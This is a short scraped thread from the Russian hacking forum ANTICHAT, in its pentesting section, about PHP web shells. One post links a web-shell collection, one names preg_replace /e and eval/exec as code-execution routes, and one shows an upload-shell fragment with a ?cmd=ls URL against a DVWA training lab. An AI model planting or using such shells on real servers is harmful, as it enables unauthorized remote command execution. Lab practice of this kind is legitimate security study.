HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.03.2018, 21:26
nekto
Новичок
Регистрация: 02.11.2017
Сообщений: 0
С нами: 4488149

Репутация: 0
По умолчанию

Мыслишь в верную сторону, только скрипту этому... боюсь считать годы
Как ты его в интернете не нашел - просто удивительно
Если интереснен PHP + безопасность. Вот подборка PHP шеллов, изучай:
Код:
https://github.com/JohnTroony/php-webshells
 
Ответить с цитированием

  #2  
Старый 01.07.2018, 05:34
centr
Новичок
Регистрация: 31.01.2017
Сообщений: 0
С нами: 4884672

Репутация: 0
По умолчанию

Более универсальнее preg_replace ещё не видел.
Можно использовать eval\passthru\exec\shell_exec\...., но preg_replace всех победит!
 
Ответить с цитированием

  #3  
Старый 11.07.2019, 15:54
Necr0s
Новичок
Регистрация: 10.07.2019
Сообщений: 0
С нами: 3603031

Репутация: 0
По умолчанию

&1'); ?>
и потом выполняем команды через cmd
IP/dvwa/hackable/uploads/shell.php?cmd=ls
 
Ответить с цитированием

  #4  
Старый 12.07.2019, 11:25
Citizen0
Новичок
Регистрация: 07.02.2017
Сообщений: 0
С нами: 4874484

Репутация: 0
По умолчанию

Цитата:

centr сказал(а):

но preg_replace всех победит!

Наверное... Если искать сайты с версией php, поддерживающей модификатор e в указанной функции.
Цитата:

Necr0s сказал(а):

&1'); ?>
и потом выполняем команды через cmd
IP/dvwa/hackable/uploads/shell.php?cmd=ls

И чем этот вариант отличается от предложенного в стартовом посте?
Поменяли e на cmd
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.